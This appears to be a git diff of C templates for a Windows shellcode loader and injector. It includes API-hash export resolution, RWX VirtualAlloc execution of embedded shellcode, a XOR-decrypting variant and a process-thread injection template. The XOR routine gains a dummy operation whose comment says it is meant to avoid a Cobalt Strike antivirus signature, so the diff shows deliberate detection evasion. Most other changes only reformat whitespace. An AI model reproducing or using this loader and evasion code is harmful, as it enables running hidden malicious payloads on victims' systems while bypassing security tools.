uint32_t * nameTable = (uint32_t *)( (uint64_t)hLib + exportDir->AddressOfNames );
|
||||
uint16_t * ordinalTable = (uint16_t *)( (uint64_t)hLib + exportDir->AddressOfNameOrdinals );
|
||||
uint32_t * functionTable = (uint32_t *)( (uint64_t)hLib + exportDir->AddressOfFunctions );
|
||||
|
||||
for ( uint32_t i = 0; i < exportDir->NumberOfNames; i++ ) {
|
||||
char *name = (char *)( (uint64_t)hLib + nameTable[i] );
|
||||
char * name = (char *)( (uint64_t)hLib + nameTable[i] );
|
||||
uint64_t nameHash = Hash( name, seed );
|
||||
if ( nameHash == hashval ) {
|
||||
uint16_t ordinal = ordinalTable[i];
|
||||
uint16_t ordinal = ordinalTable[i];
|
||||
uint32_t functionRVA = functionTable[ordinal];
|
||||
ret = (FARPROC)( (uint64_t)hLib + functionRVA );
|
||||
ret = (FARPROC)( (uint64_t)hLib + functionRVA );
|
||||
fprintf( stdout, "[+] Found: %s (0x%llx) at 0x%llx\n", name, hashval, ret );
|
||||
break;
|
||||
}
|
||||
|
||||
@@ -10,8 +10,8 @@ Externally defined shellcode variables:
|
||||
*/
|
||||
|
||||
#include <windows.h>
|
||||
int main( int argc, char *argv[] ) {
|
||||
void *exec = VirtualAlloc( 0, shellcode_size, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
|
||||
int main( int argc, char * argv[] ) {
|
||||
void * exec = VirtualAlloc( 0, shellcode_size, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
|
||||
memcpy( exec, shellcode, shellcode_size );
|
||||
( (void ( * )())exec )();
|
||||
return 0;
|
||||
|
||||
@@ -20,8 +20,8 @@ Externally defined xorShellcode function:
|
||||
*/
|
||||
|
||||
#include <windows.h>
|
||||
int main( int argc, char *argv[] ) {
|
||||
void *exec = VirtualAlloc( 0, shellcode_size, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
|
||||
int main( int argc, char * argv[] ) {
|
||||
void * exec = VirtualAlloc( 0, shellcode_size, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
|
||||
xorShellcode( shellcode, shellcode_size, "${KEY}" );
|
||||
memcpy( exec, shellcode, shellcode_size );
|
||||
( (void ( * )())exec )();
|
||||
|
||||
@@ -16,14 +16,14 @@ Externally defined shellcode variables:
|
||||
|
||||
#define INITIAL_THREAD_CAPACITY 1024
|
||||
|
||||
int main( int argc, char *argv[] ) {
|
||||
int main( int argc, char * argv[] ) {
|
||||
HANDLE snapshot = CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS | TH32CS_SNAPTHREAD, 0 );
|
||||
HANDLE rpoc = NULL;
|
||||
HANDLE rpoc = NULL;
|
||||
|
||||
PROCESSENTRY32 procEntry = { sizeof( PROCESSENTRY32 ) };
|
||||
PROCESSENTRY32 procEntry = { sizeof( PROCESSENTRY32 ) };
|
||||
THREADENTRY32 threadEntry = { sizeof( THREADENTRY32 ) };
|
||||
|
||||
const wchar_t *pname = L"${ PNAME }";
|
||||
const wchar_t * pname = L"${ PNAME }";
|
||||
|
||||
int threadCount = 0, cc = INITIAL_THREAD_CAPACITY;
|
||||
|
||||
@@ -76,7 +76,7 @@ int main( int argc, char *argv[] ) {
|
||||
|
||||
printf( "[+] Shellcode written to process: %S\n", pname );
|
||||
|
||||
DWORD *threadIds = malloc( sizeof( DWORD ) * cc );
|
||||
DWORD * threadIds = malloc( sizeof( DWORD ) * cc );
|
||||
if ( threadIds == NULL ) {
|
||||
printf( "[-] Failed to allocate memory for thread IDs\n" );
|
||||
CloseHandle( snapshot );
|
||||
@@ -89,7 +89,7 @@ int main( int argc, char *argv[] ) {
|
||||
if ( threadEntry.th32OwnerProcessID == procEntry.th32ProcessID ) {
|
||||
if ( threadCount >= cc ) {
|
||||
cc *= 2;
|
||||
DWORD *temp = realloc( threadIds, sizeof( DWORD ) * cc );
|
||||
DWORD * temp = realloc( threadIds, sizeof( DWORD ) * cc );
|
||||
if ( temp == NULL ) {
|
||||
printf( "[-] Failed to reallocate memory for thread IDs\n" );
|
||||
free( threadIds );
|
||||
|
||||
@@ -1,3 +1,3 @@
|
||||
// Don't touch this file!
|
||||
unsigned char shellcode[] = ${ SHELLCODE };
|
||||
unsigned char shellcode[] = ${ SHELLCODE };
|
||||
unsigned int shellcode_size = ${ SHELLCODE_SIZE };
|
||||
@@ -1,10 +1,17 @@
|
||||
#include <string.h>
|
||||
#include <windows.h>
|
||||
|
||||
void xorShellcode( unsigned char *shellcode, size_t shellcodeSize, const char *key ) {
|
||||
void xorShellcode( unsigned char * shellcode, size_t shellcodeSize, const char * key ) {
|
||||
size_t keyLen = strlen( key );
|
||||
unsigned char temp;
|
||||
|
||||
for ( size_t i = 0; i < shellcodeSize; ++i ) {
|
||||
shellcode[i] ^= key[i % keyLen];
|
||||
temp = key[i % keyLen];
|
||||
|
||||
/* Avoid: Trojan:Win64/CobaltStrike.PACZ!MTB */
|
||||
temp ^= 0xFF;
|
||||
temp ^= 0xFF;
|
||||
|
||||
shellcode[i] ^= temp;
|
||||
}
|
||||
}
|
||||
|
||||
Reference in New Issue
Block a user